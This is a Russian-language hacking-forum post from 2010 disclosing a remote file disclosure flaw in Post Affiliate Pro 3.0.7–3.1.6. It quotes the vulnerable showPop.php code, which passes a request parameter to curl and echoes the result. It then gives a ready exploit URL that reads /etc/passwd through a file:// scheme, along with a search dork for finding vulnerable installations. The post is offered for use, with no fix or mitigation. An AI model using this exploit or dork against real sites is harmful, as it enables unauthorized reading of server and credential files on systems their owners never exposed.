Prev Предыдущее сообщение   Следующее сообщение Next
Старый 23.08.2010, 13:23   #1
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию Post Affiliate Pro

Продукт: Post Affiliate Pro 3.0.7 <= 3.1.6 Remote File Disclosure Vulnerability
Офф сайт: www.qualityunit.com
Зависимости: Нет
Уязвимые файлы: /scripts/showPop.php
Уязвимый кусок кода:

Файл /scripts/showPop.php:
PHP код:
if(isset($_REQUEST['special']) && $_REQUEST['special'] == '1')
{

    if(
$_REQUEST['banner_content'] == '' || $_REQUEST['impression_content'] == '' 
       
|| $_REQUEST['clickurl'] == '') return;

    
$ch curl_init();
    
curl_setopt($chCURLOPT_URL$_REQUEST['banner_content']);
    
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
    
curl_setopt($chCURLOPT_RETURNTRANSFER1);
    
$content curl_exec($ch);

. . . .

    echo 
$content;

?> 

Exploit:
http://localhost/affiliatepro/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image

Dork:
"Affiliate software by QualityUnit"
asddas вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot